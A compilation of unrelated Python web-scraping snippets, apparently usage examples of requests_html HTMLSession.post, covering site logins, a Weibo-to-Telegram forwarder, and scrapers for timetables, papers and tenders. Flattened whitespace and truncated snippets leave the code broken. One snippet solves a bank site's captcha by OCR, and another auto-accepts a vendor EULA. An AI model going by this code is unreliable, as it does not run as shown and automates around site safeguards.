def get_hero_stats(): hero_stats = [] session = HTMLSession() res = session.post(hero_stats_url(), data={ 'event[]': 86, 'teamcompTypes': 1}) player_heros = [] team_heros = [] # ['gameNumber', 'roundtype', 'player', 'team', 'hero', # 'timePlayed', 'matchID', 'playerPic', 'playerName', 'teamPic', # 'nameCSFriendly', 'map', 'teamName'] for result in res.html.search_all("heroStatsArr.concat({})"): player_heros += json.loads(result[0]) # keys = ['gameNumber', 'roundtype', 'team', 'tcString', # 'gameWasPlayed', 'map', 'maptype', 'timePlayed', 'matchID'] for result in res.html.search_all("teamcompsArr.concat({})"): team_heros += json.loads(result[0]) write_json('stats/player_heros.json', player_heros) write_json('stats/team_heros.json', team_heros)
r = session.get('https://learn.uwaterloo.ca/d2l/login?&noredirect=1') user = input('WatIAm ID: ') pw = getpass() payload = { 'nordirect': 1, 'loginPath': '/d2l/login', 'UserName': user, 'Password': pw } # Log in via a session, values are sent in headers as required from here on. r = session.post('https://learn.uwaterloo.ca/d2l/lp/auth/login/login.d2l', data=payload, allow_redirects=False) # sessionVals = r.cookies.get_dict() # Go to the home page r = session.get('https://learn.uwaterloo.ca/d2l/home') soup = BeautifulSoup(r.content, 'html.parser') # find the term ID (is that what it is?) # termID is needed to find the courses for this term. # the 'calendar' URL just so happens to have this term ID calendarURL = soup.find('a', href=lambda href: href and 'calendar' in href) termID = calendarURL.get('href').split('/')[-1] # Parse the courses data courses = session.get(
def make_request(self): session = HTMLSession() response = session.post(BaseRequest.BASE_URL, data=self.params()) return response
class Weibo: def __init__(self): self.BASE_DIR = os.path.split(os.path.realpath(__file__))[0] config = configparser.ConfigParser() config.read(os.path.join(self.BASE_DIR, 'config.ini'), encoding='utf-8') self.WEIBO_ID = config.get("CONFIG", "WEIBO_ID") self.TELEGRAM_BOT_TOKEN = config.get("CONFIG", "TELEGRAM_BOT_TOKEN") self.TELEGRAM_CHAT_ID = config.get("CONFIG", "TELEGRAM_CHAT_ID") self.SESSION = HTMLSession() self.SESSION.adapters.DEFAULT_RETRIES = 5 # 增加重连次数 self.SESSION.keep_alive = False # 关闭多余连接 proxy = config.get("CONFIG", "PROXY") self.PROXIES = {"http": proxy, "https": proxy} def send_telegram_message(self, text, weibo_link): """ 给电报发送文字消息 """ headers = { 'Content-Type': 'application/json', } data = f'{{"chat_id":"{self.TELEGRAM_CHAT_ID}", "text":"{text}", "reply_markup": {{"inline_keyboard":' \ f' [[{{"text":"🔗点击查看原微博", "url":"{weibo_link}"}}]]}}}} ' url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendMessage' try: self.SESSION.post(url, headers=headers, data=data.encode('utf-8'), proxies=self.PROXIES) except: print(' |-网络代理错误,请检查确认后关闭本程序重试') time.sleep(99999) def send_telegram_photo(self, img_url): """ 给电报发送图片 """ url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendPhoto' data = dict(chat_id=f"{self.TELEGRAM_CHAT_ID}&", photo=img_url) self.SESSION.post(url, data=data, proxies=self.PROXIES) def parse_weibo(self, weibo): """ 检查当前微博是否已处理过,如果没处理过则发送博文以及配图到Telegram """ conn = sqlite3.connect(os.path.join(self.BASE_DIR, 'db', 'weibo.db')) cursor = conn.cursor() sql = "SELECT COUNT(id) AS counts FROM weibo WHERE link = ?" cursor.execute(sql, (weibo['link'],)) result = cursor.fetchone() if result[0] <= 0: self.send_telegram_message( '{}{}'.format( f"[{len(weibo['pics'])}图] " if weibo['pics'] else '', weibo['title'], ), weibo['link'] ) # 把图片url发送到Telegram中,可以第一时间在Telegram中收到推送 for pic in weibo['pics']: self.send_telegram_photo(pic) # 配图发送到Telegram毕后,将配图独立保存到本地一份 for pic in weibo['pics']: filename = pic[pic.rfind('/') + 1:] filename = os.path.join(self.BASE_DIR, 'images', filename) wget.download(pic, out=filename) sql = "INSERT INTO weibo(summary, link) VALUES(?, ?)" cursor.execute(sql, ( weibo['title'], weibo['link'], )) conn.commit() conn.close() return True else: return False def test(self): print('* 正在检查微博ID是否配置正确') url = f'https://m.weibo.cn/api/container/getIndex?containerid=100505{self.WEIBO_ID}' try: weibo_name = self.SESSION.get(url).json()['data']['userInfo']['screen_name'] print(f'【正确】当前设置的微博账户为:@{weibo_name}') except: print('【错误】请重新测试或检查微博数字ID是否正确') print('\n* 正在检查代理是否配置正确') try: status_code = self.SESSION.get('https://www.google.com',proxies=self.PROXIES, timeout=5).status_code if status_code == 200: print('【正确】代理配置正确,可正常访问') else: print('【错误】代理无法访问到电报服务器') except: print('【错误】代理无法访问到电报服务器') def run(self): print(time.strftime('%Y-%m-%d %H:%M:%S 执行完毕', time.localtime())) url = f'https://m.weibo.cn/api/container/getIndex?containerid=107603{self.WEIBO_ID}' try: weibo_items = self.SESSION.get(url).json()['data']['cards'][::-1] except: print(' |-访问url出错了') for item in weibo_items: weibo = {} weibo['title'] = BeautifulSoup(item['mblog']['text'].replace('<br />', '\n'), 'html.parser').get_text() if item['mblog'].get('weibo_position') == 3: # 如果状态为3表示转发微博,附加上转发链,状态1为原创微博 retweet = item['mblog']['retweeted_status'] try: weibo['title'] = f"{weibo['title']}//@{retweet['user']['screen_name']}:{retweet['raw_text']}" except: weibo['title'] = f"{weibo['title']}//转发原文不可见,可能已被删除" try: weibo['pics'] = [pic['large']['url'] for pic in item['mblog']['pics']] except: weibo['pics'] = [] short_url = item['scheme'] short_url = short_url[short_url.rindex('/') + 1:short_url.index('?')] weibo['link'] = f'https://weibo.com/{self.WEIBO_ID}/{short_url}' self.parse_weibo(weibo)
from requests_html import HTMLSession browser = HTMLSession() data_login = {'account': '*****@*****.**', 'password': '******'} url_login_api = 'https://api.mtdhb.org/user/login' r = browser.post(url_login_api, data=data_login) print(r.json()['code'])
class F5Downloads: def __init__(self, username, password, default_location='IRELAND'): self.username = username self.password = password self.default_location = default_location self._session = None self._version_pages = None self.new_files = [] @property def session(self): if not self._session: self._session = HTMLSession() self._session.post( 'https://api-u.f5.com/auth/pub/sso/login/user', headers={'Content-Type': 'application/x-www-form-urlencoded'}, data={ 'userid': self.username, 'passwd': self.password, }) return self._session def find_links(self, page, pattern): return [(l.text, next(iter(l.absolute_links))) for l in page.html.find('a') if l.text and l.absolute_links and re.match(pattern, l.text)] def follow_specific_link(self, **kwargs): page = kwargs['page'] pattern = kwargs['pattern'] matching_links = self.find_links(page, pattern) # To proceed in the chain we need exactly one match if len(matching_links) != 1: logger.error( 'Found {len(matching_links)} matches for url {url} and pattern {pattern}, unable to proceed' ) logger.error('Files found:') logger.error(matching_links) raise Exception(f'') name, url = matching_links[0] logger.debug(f'Following {name} with {url}') return self.get_page(url) def pick_latest_version(self, **kwargs): page = kwargs['page'] pattern = kwargs['pattern'] matching_links = self.find_links(page, pattern) if not len(matching_links): raise Exception( f'No versions matching {pattern} found on page {page}') versionDict = {} # This is an ugly one. Threat the versions as a decimal number and increase the worth # of each version number by a factor of 10, then return the sum for version, url in matching_links: number = version.replace('.', '') versionDict[number] = (version, url) # Pick the highest number version, url = versionDict[max(versionDict, key=int)] logger.debug(f'Picking {version} as latest version') return self.get_page(url) def follow_path(self, page, steps): step = steps.pop(0) f = step['f'] args = step['args'] args['page'] = page result = f(**args) if not len(steps): return result elif result: return self.follow_path(result, steps) # Detect if the EULA exists and circle around it def get_page(self, url): page = self.session.get(url) if len(page.html.find('input#accept-eula')): logger.debug('EULA encountered, accepting it') page = self.session.get( url.replace('https://downloads.f5.com/esd/ecc.sv', 'https://downloads.f5.com/esd/eula.sv')) return page def download_files(self, **kwargs): page = kwargs['page'] pattern = kwargs['pattern'] download_folder = kwargs['download_folder'] cb = kwargs['cb'] # Create folders if needed pathlib.Path(download_folder).mkdir(parents=True, exist_ok=True) matching_links = self.find_links(page, pattern) for name, url in matching_links: md5_name, md5_url = next( iter(self.find_links(page, rf'^{name}.md5$')), (None, None)) # Only download if there's a matching md5 file if not md5_name: raise Exception(f'No matching md5 file found for {name}') file_path = f'{download_folder}{name}' md5_path = f'{download_folder}{md5_name}' self.download_file(md5_path, md5_url) if self.md5_sum_ok(md5_path, file_path): logger.info('The newest file already exists on disk') return file_path else: self.download_file(file_path, url) logger.info(f'Validating {name} against the supplied md5') if self.md5_sum_ok(md5_path, f'{download_folder}{name}'): logger.info('Downloaded file successfully') if cb: cb(file_path) return (file_path) else: raise Exception(f'Failed to download file {name}') def md5_sum_ok(self, md5_file, file): if not os.path.exists(md5_file): raise Exception(f'{md5_file} does not exist') if not os.path.exists(file): logger.info(f'{file} does not exist') return False with open(md5_file, 'r') as f: md5sum = re.sub(r' .+\n$', '', f.read()) file_sum = self.md5(file) return md5sum == file_sum def md5(self, file_name): hash_md5 = hashlib.md5() with open(file_name, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() def download_file(self, file_path, url): if os.path.exists(file_path): os.remove(file_path) page = self.get_page(url) name, download_url = next( iter(self.find_links(page, rf'{self.default_location}')), (None, None)) if (download_url): logger.debug(f'Saving file as ./{file_path}') with self.session.get(download_url, stream=True) as r: r.raise_for_status() with open(file_path, 'wb') as f: for chunk in r.iter_content(chunk_size=8192): f.write(chunk) def download_geoipdb(self, version, cb=None): return self.follow_path( self.get_page('https://downloads.f5.com/esd/productlines.jsp'), [{ 'f': self.follow_specific_link, 'args': { 'pattern': rf'BIG-IP v{version}.x.+' }, }, { 'f': self.follow_specific_link, 'args': { 'pattern': r'GeoLocationUpdates', } }, { 'f': self.download_files, 'args': { 'pattern': rf'^ip-geolocation-.+\.zip$', 'download_folder': f'./downloads/GeoIP/v{version}/', 'cb': cb } }]) def download_latest_version(self, version, cb=None): return self.follow_path( self.get_page('https://downloads.f5.com/esd/productlines.jsp'), [{ 'f': self.follow_specific_link, 'args': { 'pattern': rf'BIG-IP v{version}.x.+' }, }, { 'f': self.pick_latest_version, 'args': { 'pattern': rf'^{version}[\.0-9]+$', } }, { 'f': self.download_files, 'args': { 'pattern': rf'^BIGIP-{version}[\.0-9]+.+iso$', 'download_folder': f'./downloads/BIG-IP/v{version}/', 'cb': cb } }])
class ActivityHelper(): def __init__(self, id): super().__init__() self.id = id self.session = HTMLSession() def get_chptcha(self): # get captcha code ocr = CaptchaOCR( 'https://mkp-tsbank.cdn.hinet.net/tscccms/CodeController/kaptcha') return ocr.parse(), ocr.get_image_response() def login(self): code, response = self.get_chptcha() self.cookie = response.cookies['SESSION'] print('Cookie: %s' % self.cookie) data = {'verifyCode': code, 'cust_id': self.id, 'eventId': ''} headers = { 'User-Agent': 'Mozilla/5.0', 'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Cookie': 'SESSION=%s' % self.cookie } r = self.session.post( 'https://mkp-tsbank.cdn.hinet.net/tscccms/checkVerifyCode', data=data, headers=headers) result = r.html.html if result == 'notPassCode' or result == 'overLimit' or result == 'noPass' or result == 'errorFormat': print("Error: ", result) def find_all(self): headers = { 'User-Agent': 'Mozilla/5.0', 'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Cookie': 'SESSION=%s' % self.cookie } r = self.session.get( 'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select', headers=headers) activities = r.html.find( '.form-item:not(.form-item-selected) input:checkbox[name="event-select"]' ) datas = [] for item in activities: event_values = item.attrs['value'].split('_') datas.append({ 'eventId': event_values[0], 'installmentEvent': event_values[1], 'regEndDate': datetime.strptime(event_values[2], '%a %b %d %H:%M:%S %Z %Y').strftime( '%Y-%m-%dT%H:%M:%S.000+08:00').__str__() }) print('Selected: %s' % datas) break return datas def select_all(self): datas = self.find_all() headers = { 'User-Agent': 'Mozilla/5.0', 'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select', 'Content-Type': 'application/json; charset=UTF-8', 'Cookie': 'SESSION=%s' % self.cookie, 'Accept': 'text/plain, */*; q=0.01' } r = self.session.post( 'https://mkp-tsbank.cdn.hinet.net/tscccms/register/save', data=json.dumps(datas), headers=headers) print('Result: %s' % (int(r.text) == len(datas))) def execute(self): self.login() self.select_all()
class ArrivaScraper: def __init__(self): self.url = "https://www.arriva.com.hr/en-us/choose-your-journey" self.session = HTMLSession() self.data = { "post-type": "shop", "currentstepnumber": "1", "search-from": None, "search-to": None, "search-datetime": None, "ticket-type": "oneway", } self.html = None self.cacher = CacheController() def run(self, source, destination, date): search = [source, destination, date] self.data["search-from"] = search[0] self.data["search-to"] = search[1] self.data["search-datetime"] = search[2] cached_data = self.cacher.getJourneys(search) if cached_data: return cached_data self.html = self.session.post(self.url, self.data).html return self.parseData(search) def parseData(self, search): dep = self.fetchDepartures() arr = self.fetchArrivals() dur = self.fetchDurations() pr = self.fetchPrices() carr = self.fetchCarriers() journeys = [ Journey( source=search[0], destination=search[1], date=search[2], departure=dep[i] + " h", arrival=arr[i] + " h", duration=dur[i] + " h", price=pr[i], carrier=carr[i], ) for i in range(len(dep)) ] return self.cacher.cacheJourneys(journeys, search) def fetchDepartures(self): return [ dep.find("strong")[0].text.split("-")[0][:-1] for dep in self.html.find(".vrijeme-top") ] def fetchArrivals(self): return [ arr.find("strong")[0].text.split("-")[1][1:] for arr in self.html.find(".vrijeme-top") ] def fetchPrices(self): prices = [ pr.find("a")[0].text.split(",")[0] for pr in self.html.find(".cijena") if pr.find("a") != [] ] return [round(c.convert(int(ep), "HRK"), 2) for ep in prices] def fetchDurations(self): return [dur.text[16:] for dur in self.html.find(".vrijeme-bottom")] def fetchCarriers(self): return [carr.text[9:] for carr in self.html.find(".prijevoznik")]
from requests_html import HTMLSession login_url1 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO' login_url2 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO?execution=e1s1' data = {'j_username': '******', 'j_password': '******'} s = HTMLSession() r = s.post(login_url1, data=data) r.html.render() r = s.post(login_url2, data=data) print(r.status_code) for i in r.cookies: print(i)
class CqvipSpider(object): def __init__(self): self.base_url = 'http://qikan.cqvip.com/Qikan/Search/Index?' self.main_url = 'http://qikan.cqvip.com' self.test_url = 'http://qikan.cqvip.com/Search/SearchList' self.session = HTMLSession() com = CommonSettings() self.headers = com.set_common_headers() # self.keyword = com.set_common_keyword() self.pagesize = com.set_common_pagesize() self.csvname = com.set_common_output()[1] @retry() def post(self, url, data): result = self.session.post(url, data=data, timeout=10) result.encoding = result.apparent_encoding return result def get_init_page(self, search_word): data = { 'key': 'U=' + search_word, 'isNoteHistory': '1', 'isLog': '1', 'indexKey': search_word, 'indexIdentifier': 'U' } attempts = 0 success = False while attempts < 100 and not success: try: result = self.post(self.base_url, data) print('status of init page is %s' % result) if result.status_code != 200: attempts += 1 print('status.error') print('第' + str(attempts) + '次重试!!') if attempts == 100: break else: bsoj = BeautifulSoup(result.text, features='lxml') # print(bsoj) total_count = bsoj.find('input', {'id': 'hidShowTotalCount'})['value'] page_count = math.ceil(int(total_count)/self.pagesize) print('总页数为%s页' % page_count) socket.setdefaulttimeout(10) # 设置10秒后连接超时 success = True return total_count, page_count except OSError as e: # remember to enable proxy connection attempts += 1 print('init page callback: %s' % e) print('第' + str(attempts) + '次重试!!') if attempts == 100: break def get_qikan_page(self, search_word): containers = [] null = None # python中的None vs js中的Null total_count = self.get_init_page(search_word)[0] page_count = self.get_init_page(search_word)[1] breakpoint = 1 attempts = 0 success = False while attempts < 100 and not success: try: while breakpoint <= page_count: container = [] print('正在爬取第%s页...' % breakpoint) searchParamModel = json.dumps({"ObjectType": 1, "SearchKeyList":[],"SearchExpression": null,"BeginYear": null,"EndYear": null,"UpdateTimeType": null,"JournalRange": null,"DomainRange": null,"ClusterFilter": "","ClusterLimit": 0,"ClusterUseType": "Article","UrlParam": "U=" + self.keyword,"Sort": "0","SortField": null,"UserID": "0","PageNum": breakpoint,"PageSize": self.pagesize,"SType": null,"StrIds": null,"IsRefOrBy": 0,"ShowRules": " 任意字段=" + self.keyword + " ","IsNoteHistory": 0,"AdvShowTitle": null,"ObjectId": null,"ObjectSearchType": 0,"ChineseEnglishExtend": 0,"SynonymExtend": 0,"ShowTotalCount": int(total_count),"AdvTabGuid":""}) # print(searchParamModel) data = { 'searchParamModel': searchParamModel } result = self.post(self.test_url, data) print('status of qikan page is %s' % result) if result.status_code != 200: attempts += 1 print('qikan.status.error') print('第' + str(attempts) + '次重试!!') if attempts == 100: break else: soup = BeautifulSoup(result.text, features='lxml') # print(soup) simple_div = soup.find('div', {'class': 'simple-list'}) # print(simple_div) dls = simple_div.findAll('dl') for dl in dls: field = {} dt = dl.find('dt') if dt.find('span', {'class': 'cited'}): cited_span = dt.find('span', {'class': 'cited'}) cited = cited_span.find('a')['data-zkbycount'] field['cited'] = cited else: cited = '0' field['cited'] = cited download = self.main_url + dt.find('a')['href'] field['download'] = download container.append(field) containers.extend(container) print('第%s页爬取结束!' % breakpoint) breakpoint += 1 if breakpoint > page_count: print('已爬取结束, 共%s页' % (breakpoint-1)) else: print('新断点记录为第%s页' % breakpoint) socket.setdefaulttimeout(10) # 设置10秒后连接超时 success = True return containers except OSError as e: # remember to enable proxy connection attempts += 1 print('qikan page callback: %s' % e) print('第' + str(attempts) + '次重试!!') if attempts == 100: break def get_detail_page(self, search_word): breakpoint = 0 attempts = 0 repos = [] success = False containers = self.get_qikan_page(search_word) while attempts < 100 and not success: try: while breakpoint < len(containers): repo = {} cited = containers[breakpoint]['cited'] repo['cited'] = cited download = containers[breakpoint]['download'] repo['download'] = download print('正在爬取链接为:%s' % download) abuyun = AbuyunProxy() proxy_handler = abuyun.urllib_proxy_settings()[1] opener = urllib.request.build_opener(proxy_handler) urllib.request.install_opener(opener) request = urllib.request.Request(download, headers=self.headers) print('status of detail page is %s' % request) html = urllib.request.urlopen(request, timeout=10).read() soup = BeautifulSoup(html, 'lxml') # print('detail page is parsed as \n%s' % soup) if soup.find('div', {'class': 'article-title'}): title_div = soup.find('div', {'class': 'article-title'}) raw_title = title_div.find('h1').get_text() raw_title1 = re.sub('预览', '', raw_title).strip().replace('\r', '').replace('\n', '') title = re.sub('被引量.*', '', raw_title1).strip() print(title) repo['title'] = title else: title = 'N/A' repo['title'] = title article_div = soup.find('div', {'class': 'article-detail'}) abstract_div = article_div.find('div', {'class': 'abstract'}) if abstract_div.find('span', {'class': 'abstract'}): abstract = abstract_div.find('span', {'class': 'abstract'}).get_text().replace('\r', '').replace('\n', '').strip('\'').replace(',', ',') print(abstract) repo['abstract'] = abstract else: abstract = 'N/A' repo['abstract'] = abstract author_div = article_div.find('div', {'class': 'author'}) if author_div.find('span'): raw_author = author_div.findAll('span')[1].get_text().replace('\n', ';') raw_author1 = re.sub('^;|;$', '', raw_author) author = raw_author1.replace(';', ' ') print(author) repo['author'] = author else: author = 'N/A' repo['author'] = author if article_div.find('div', {'class': 'organ'}): info_div = article_div.find('div', {'class': 'organ'}) if info_div.find('span'): raw_info = info_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', ';') info = re.sub('^;|;$', '', raw_info) print(info) repo['info'] = info else: info = 'N/A' repo['info'] = info else: info = 'N/A' repo['info'] = info if article_div.find('div', {'class': 'journal'}): date_div = article_div.find('div', {'class': 'journal'}) if date_div.find('span', {'class': 'vol'}): raw_date = date_div.find('span', {'class': 'vol'}).get_text().strip('\n').strip('\'').strip('').strip() date = re.search('^.*年', raw_date).group() print(date) repo['date'] = date else: date = 'N/A' repo['date'] = date else: date = 'N/A' repo['date'] = date source = '维普期刊' repo['source'] = source downed = '暂无' repo['downed'] = downed if article_div.find('div', {'class': 'fund'}): fund_div = article_div.find('div', {'class': 'fund'}) funds = [] if fund_div.find('span'): if len(fund_div.findAll('span')) > 2: fund_span = fund_div.findAll('span')[1:] for span in fund_span: fund_piece = span.get_text().replace('\r', '').replace('\n', '').strip() funds.append(fund_piece) fund = ';'.join(funds) print(fund) repo['fund'] = fund else: fund = fund_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', '').strip().replace(',', ',') repo['fund'] = fund else: fund = 'N/A' repo['fund'] = fund else: fund = 'N/A' repo['fund'] = fund if article_div.find('div', {'class': 'subject'}): kws_div = article_div.find('div', {'class': 'subject'}) kwss = [] if kws_div.find('span'): if len(kws_div.findAll('span')) > 2: kws_span = kws_div.findAll('span')[1:] for span in kws_span: kws_piece = span.get_text() kwss.append(kws_piece) kws = ';'.join(kwss) repo['kws'] = kws else: kws = kws_div.findAll('span')[1].get_text() repo['kws'] = kws else: kws = 'N/A' repo['kws'] = kws else: kws = 'N/A' repo['kws'] = kws repos.append(repo) print('第%s篇论文爬取结束!' % breakpoint) breakpoint += 1 if breakpoint == len(containers): print('已爬取结束, 共%s页' % (breakpoint-1)) else: print('新断点记录为第%s页' % breakpoint) socket.setdefaulttimeout(10) # 设置10秒后连接超时 success = True print(repos) return repos except OSError as e: # remember to enable proxy connection attempts += 1 print('detail page callback: %s' % e) print('第' + str(attempts) + '次重试!!') if attempts == 100: break def save_data(self, search_word): try: csv_data = self.get_detail_page(search_word) sheet = pyexcel.Sheet() for data in csv_data: sheet.row += pyexcel.get_sheet(adict=data, transpose_after=True) sheet.colnames = ['title', 'author', 'source', 'info', 'date', 'kws', 'cited', 'downed', 'abstract', 'fund', 'download'] print(sheet) sheet.save_as(self.csvname) except Exception as e: print('404 error!%s' % e) def pandas_save_data(self, search_word): try: csv_data = self.get_detail_page(search_word) dataframe = pd.DataFrame(csv_data) print(dataframe) dataframe.to_csv(self.csvname, index=False, sep=',', encoding='utf-8') print('data saved') except Exception as e: print('404 error!%s' % e)
from requests_html import HTMLSession from Constants import * session = HTMLSession() session.post(loginUrl, loginInfo) def get_verification_token(r): verification_token = r.html.find('input', first=True).attrs['value'] return verification_token def create_crises(): r = session.get(createCrisesUrl) verification_token = get_verification_token(r) payload = create_crises_info(verification_token) return_action(CREATE, payload, createCrisesUrl) def return_action(action, payload, url): session.post(url, data=payload, headers=headers) def get_crises(properties): r = session.get(crisesListUrl) links = [x for x in r.html.absolute_links if properties in x] return links
class AnchorInfo(object): def __init__(self, env): self.url = 'http://www.darenji.com/search.html' self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36', 'Referer': 'http://www.darenji.com/search.html', } self.env_dict = environments.get(env) self.r = redis.StrictRedis().from_url( url=self.env_dict.get('redis_url')) self.clent = MongoClient(self.env_dict.get('mongodb_host'), port=self.env_dict.get('mongodb_port')) self.db = self.clent['pltaobao'] self.session = HTMLSession() def save_data(self, id, nickname, fansCount, anchorPhoto, houseId, descText): self.r.sadd('anchorId', str(id)) self.r.sadd('anchorName', nickname) collection = self.db['anchor_info'] res = collection.find_one({'anchorId': str(id)}) if not res: data = { 'anchorId': str(id), 'anchorName': nickname, 'houseId': int(houseId), 'fansCount': int(fansCount), 'liveCount': None, 'city': None, 'creatorType': None, 'darenScore': None, 'descText': descText, 'anchorPhoto': anchorPhoto, 'organId': None, 'fansFeature': None, 'historyData': None, } collection.insert_one(data) def get_data(self, anchor_name): try: rs = self.session.post(url=self.url, headers=self.headers, data={'conditions': anchor_name}, timeout=3) except: return None find_count = rs.html.xpath('//*[@id="qcount"]/text()')[0] if find_count == '0': return None nick_list = rs.html.xpath('//*[@id="nickname"]/text()') anchorPhoto_list = rs.html.xpath('//*[@id="paginate"]/li/div/a/@style') fans_num = rs.html.xpath( '//*[@id="paginate"]/li/div/div[1]/h1/span/text()') house_id = rs.html.xpath( '//*[@id="paginate"]/li/div/div[1]/p/span/text()') desc_text = rs.html.xpath( '//*[@id="paginate"]/li/div/div[2]/div[1]/p/text()') for index, nick in enumerate(nick_list): id = anchorPhoto_list[index].split('/')[5] nickname = nick_list[index].replace(' ', '').replace("\n", "") fansCount = fans_num[index].replace(' 粉丝数量:', '') anchorPhoto = anchorPhoto_list[index].replace( 'background:url(', 'https:').replace(') no-repeat;', '') houseId = house_id[index] descText = desc_text[index].strip().replace("\n", "") print(id, nickname) if nickname == anchor_name: anchorId = id self.save_data(id, nickname, fansCount, anchorPhoto, houseId, descText) break else: anchorId = None # self.save_data(id, nickname, fansCount, anchorPhoto, houseId, descText) print(anchorId) return anchorId
class Bidding: def __init__(self, url, page): self.url = url self.loginurl = self.url + '/cblcn/member.login/login' self.yzmurl = self.url + '/cblcn/member.login/captcha' self.loginchkurl = self.url + '/cblcn/member.login/logincheck' self.page = page self.key_title1 = '风电' self.key_title2 = '风力' self.key_content = '风力发电机组' self.exp_list = [ '询价', '施工', '维修', '维护', '运维', '改造', '接地', '海缆', '改建', '中标', '塔筒', '塔架', '基础', '法兰', '锚栓', '压站', '主轴', '主变', '箱变', '勘察', '设计', '滤芯', '螺栓', '电气', '线路', '道路', '监理', '备件', '吊装', '可研', '润滑', '配电', '装置', '检测', '检修', '监测', '监督', '测试', '测评', '试验', '变更', '更换', '技改', '验收', '安装', '分包', '电缆', '光缆', '材料', '箱式', '框架', '造价', '通信', '编码', '定检', '叶片', '倒运', '消防', '开关', '主体', '集控', '诊断', '齿轮', '柴油', '部件', '电池', '风扇', '充电', '故障', '消缺', '外委', '水土', '电容', '稳控', '变桨', '滑环', '打捆', '咨询', '测风', '电压', '电源', '电阻', '电梯', '模块', '网关', '数据', '驱动', '配件', '刹车', '升降', '防尘', '评估', '档案', '监控', '偏航', '标识', '土建', '振动', '仿真', '通讯', '液压', '雷电', '租赁', '端子', '紫铜', '蓄能', '加热', '控制', '接口', '导流', '变频', '工控', '继电器', '风速仪', '熔断器', '交换机', '集电环', '联轴器', '变压器', '变流器', '可行性', '启动', '滤网', '补偿', '二次', 'GIS', 'SVG', '加密', '除湿', '寻甸', '元谋', '风向', '运输'] # 电机 self.sel_title = 'tbody tr td a' self.sel_content = 'div.xq_nr' self.sel_pubdate = 'div.xiab_1 > span' self.session = HTMLSession() # 获取session对象,可自动记录Cookies值 self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) ' 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 ' 'Safari/537.36', 'referer': 'https://www.chinabidding.cn/', } self.data = {} self.t = time.time() self.stamp = str(round(self.t * 1000)) # 获取毫秒级时间戳 self.now = time.strftime('%Y-%m-%d', time.localtime(self.t)) # 获取当前日 def get_response(self, url): r = self.session.get(url, params=self.data, headers=self.headers) return r def chk_login(self): response = self.get_response(self.loginurl) # 获取登录页面的验证码 userid = response.html.find('div.deng_nr_1 > input', first=True).attrs['value'] self.data = { 't': self.stamp, 'randomID': userid } yzmpic = self.get_response(self.yzmurl) # 获取验证码图片并保存 f = open('captcha.jpg', 'wb') f.write(yzmpic.content) f.close() os.system('start captcha.jpg') # 显示验证码图片 yzm = input('输入验证码:') logindata = { 'name': '联合动力', 'password': '******', 'url': '', 'yzm': yzm, 'randomID': userid, } rep = self.session.post(self.loginchkurl, data=logindata, headers=self.headers) # print(rep, rep.text) # response = self.session.post(self.loginurl, data=logindata, # headers=self.headers) # print(response.text) # 登录成功自动跳转到首页 if rep.text == '5': print('登录失败') return False else: print('登录成功') return True def get_result(self): start = time.time() if self.chk_login(): # 获取验证码、下载、输入并登录 for i in range(1, self.page): searchurl = self.url + '/search/searchgj/zbcg' self.data = { 'areaid': '', 'keywords': '风电', 'time_start': self.now, 'time_end': self.now, 'page': i, 'search_type': 'CONTEXT', 'categoryid': '', 'rp': '30', 'table_type': '', 'b_date': 'week', } response = self.get_response(searchurl) item_list = response.html.find(self.sel_title) # print(item_list) for item in item_list: try: href = self.url + item.attrs['href'] title = item.attrs['title'] except Exception: continue # title = item.text # print(title) if self.chk_title(title): # 筛选标题去除相关条目 if self.key_title1 in title or self.key_title2 \ in title: response = self.get_response(href) try: content = response.html.find( self.sel_content, first=True).text pubdate = response.html.find( self.sel_pubdate, first=True).text except Exception: continue # print(content) if self.key_content in content: webbrowser.open(href) print(href, pubdate, title) time.sleep(1) end = time.time() - start print('耗时:%.2f秒' % end) print(time.strftime("%H:%M:%S")) # 当前时间 def chk_title(self, title): for word in self.exp_list: if word in title: # print(word) return False # print(title) return True
Attempt at web scraping Piazza This does not work, because Piazza uses Javascript to retrieve post data """ # session = requests.Session() # s = session.post("https://piazza.com/class", data=userdata.data, cookies=userdata.cookies) # url = "https://piazza.com/class/kea8ntdsn097ev?cid=1494" # s = session.get(url) # soup = BeautifulSoup(s.content, "html.parser") # print(soup.get_text()) session = HTMLSession() r = session.get("https://piazza.com/") r = session.post("https://piazza.com/class", data=userdata.data) page = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1") page.html.render() soup = BeautifulSoup(page.html, "html.parser") print(soup.get_text()) # data = '{"method":"content.get","params":{"cid":"khksgq944s2172","nid":"kek9zeb4r1g3ir","student_view":false}}' # r = session.post('https://piazza.com/logic/api', data=userdata.data) # soup = BeautifulSoup(r.html, "html.parser") # print(soup.get_text()) # r = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1494") # soup = BeautifulSoup(r.html.text, "html.parser") # url = "https://piazza.com/class/kea8ntdsn097ev?cid=1"
